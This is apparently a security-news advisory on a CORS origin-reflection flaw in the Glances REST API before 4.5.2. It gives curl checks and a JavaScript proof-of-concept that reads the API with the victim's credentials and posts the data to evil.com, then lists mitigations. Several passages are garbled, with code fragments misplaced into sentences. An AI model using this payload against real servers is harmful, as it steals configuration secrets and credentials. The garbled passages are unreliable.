Listen to this Post
How CVE-2026-32610 Works
The Glances REST API web server, prior to version 4.5.2, ships with a default CORS (Cross-Origin Resource Sharing) configuration that sets `allow_origins=[“”]` combined with allow_credentials=True. According to the CORS specification, browsers must reject responses that include both `Access-Control-Allow-Origin: ` and `Access-Control-Allow-Credentials: true` — this combination is explicitly forbidden because it would allow any website to make authenticated cross-origin requests.
However, Starlette’s `CORSMiddleware` implements a workaround: when `allow_origins=[“”]` and allow_credentials=True, instead of returning the literal “ wildcard, the middleware reflects the requesting `Origin` header value back in the `Access-Control-Allow-Origin` response header. This means the server echoes whatever origin the attacker provides, while simultaneously sending Access-Control-Allow-Credentials: true.
The issue manifests as follows:
- An attacker hosts a malicious page on `https://evil.com`.
- A victim who has an active authenticated session with a Glances instance (via browser Basic Auth or other cookie-based authentication) visits the attacker’s page.
- The malicious JavaScript executes a `fetch()` request to the Glances API endpoint (e.g.,
http://glances-server:61208/api/4/config`) withcredentials: “include”`. - The browser automatically attaches the stored credentials (Basic Auth headers, cookies, etc.) to the request.
- Starlette’s `CORSMiddleware` sees the request `Origin: https://evil.com` and responds with:
- `Access-Control-Allow-Origin: https://evil.com`
– `Access-Control-Allow-Credentials: true`
– The browser, seeing that the reflected origin matches the requesting page’s origin and that credentials are allowed, permits JavaScript to read the full response body. - The attacker exfiltrates sensitive data such as system monitoring information, configuration secrets, command-line arguments (which may contain passwords and API keys), and more.
The preflight (OPTIONS) request for non-simple requests also echoes the requested headers back, approving credentialed requests for methods like POST and custom headers. When Glances runs without the `–password` flag (the default for most internal network deployments), no authentication is required at all, making any website capable of directly reading all API endpoints.
DailyCVE Form
| Field | Value |
|-|-|
| Platform | Glances REST API (Starlette CORSMiddleware) |
| Version | < 4.5.2 |
| Vulnerability | CORS origin reflection with credentials |
| Severity | High (CVSS 8.1) |
| Date | 2026-03-18 |
| Prediction | Already patched in v4.5.2 (2026-03-14) |
What Undercode Say
Analytics & Verification Commands
Start Glances web server (default, no password) glances -w Verify CORS headers from a malicious origin curl -s -D- -o /dev/null \ -H "Origin: https://evil.com" \ http://localhost:61208/api/4/all Expected response headers: Access-Control-Allow-Origin: https://evil.com Access-Control-Allow-Credentials: true Verify data theft without authentication curl -s http://localhost:61208/api/4/all | python -m json.tool | head -20 curl -s http://localhost:61208/api/4/config | python -m json.tool curl -s http://localhost:61208/api/4/args | python -m json.tool With authentication enabled, verify credentialed requests work glances -w --password curl -s -D- -o /dev/null \ -X OPTIONS \ -H "Origin: https://evil.com" \ -H "Access-Control-Request-Method: GET" \ -H "Access-Control-Request-Headers: Authorization" \ http://localhost:61208/api/4/all Expected: Access-Control-Allow-Origin: https://evil.com Expected: Access-Control-Allow-Credentials: true
Proof-of-Concept (JavaScript)
<!-- steal-glances.html hosted on attacker's server -->
<script>
async function steal() {
const target = "http://glances-server:61208";
// Steal system stats (processes, CPU, memory, network, disk)
const all = await fetch(target + "/api/4/all", { credentials: "include" });
const allData = await all.json();
// Steal configuration (may contain database passwords, API keys)
const config = await fetch(target + "/api/4/config", { credentials: "include" });
const configData = await config.json();
// Steal command line args (contains password hash, SNMP creds)
const args = await fetch(target + "/api/4/args", { credentials: "include" });
const argsData = await args.json();
// Exfiltrate to attacker
fetch("https://evil.com/collect", {
method: "POST",
body: JSON.stringify({ all: allData, config: configData, args: argsData })
});
}
steal();
</script>
Exploit
An attacker can exploit this vulnerability in four simple steps:
1. Host a malicious page on a domain they control (e.g., https://evil.com/steal.html`).credentials: “include”
2. Lure a victim who has an active authenticated session with a Glances instance to visit that page. The victim may have authenticated via the browser's Basic Auth dialog (which caches credentials) or via cookies.
3. Execute cross-origin requests from the malicious page to the Glances API endpoints using `fetch()` with. The browser automatically attaches the stored credentials.glances/outputs/glances_restful_api.py
4. Exfiltrate the response data — the server reflects the attacker's origin in `Access-Control-Allow-Origin` and allows credentials, so the browser grants full read access to the response. The attacker can then steal system stats, configuration files, command-line arguments, and even perform state-changing operations like clearing event logs or modifying process monitoring.
With Glances running without `--password` (the default), no authentication is required, making the attack trivial — any website visited by a user on the same network can silently read all API endpoints.
<h2 style="color: blue;">Protection</h2>
To mitigate this vulnerability, apply one of the following fixes:
1. Upgrade to Glances version 4.5.2 or later, which addresses this issue.
2. Change the default CORS credentials setting to `False` in:
cors_credentials = config.get_bool_value('outputs', 'cors_credentials', default=False) Changed from True
3. When credentials are required, configure explicit allowed origins instead of using the wildcard:
cors_origins = config.get_list_value('outputs', 'cors_origins', default=["https://trusted-domain.com"])
4. Reject the insecure combination at startup by warning and forcing `cors_credentials = False` whencors_origins == [“”].[“”]
5. Restrict allowed methods to only those necessary (e.g., `["GET"]` instead of).–password
<h2 style="color: blue;">Impact</h2>
- Without `--password` (default): Any website visited by a user on the same network can silently read all Glances API endpoints, including complete system monitoring data (process list with command lines, CPU/memory/disk stats, network interfaces, filesystem mounts, Docker container info), configuration file contents (which may contain database passwords, export backend credentials, API keys), and command-line arguments.
- With: If the user has previously authenticated via the browser's Basic Auth dialog (which caches credentials), any website can make cross-origin requests that carry those cached credentials. This allows exfiltration of all the above data plus the password hash itself (via/api/4/args)./api/4/events/clear/all
- Network reconnaissance: An attacker can use this to map internal network infrastructure by having victims visit a page that probes common Glances ports (61208) on internal IPs.
- State-changing attacks: The CORS policy also allows POST methods, enabling an attacker to clear event logs () or modify process monitoring (/api/4/processes/extended/{pid}`).
– CVSS Score: 8.1 (High) — Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

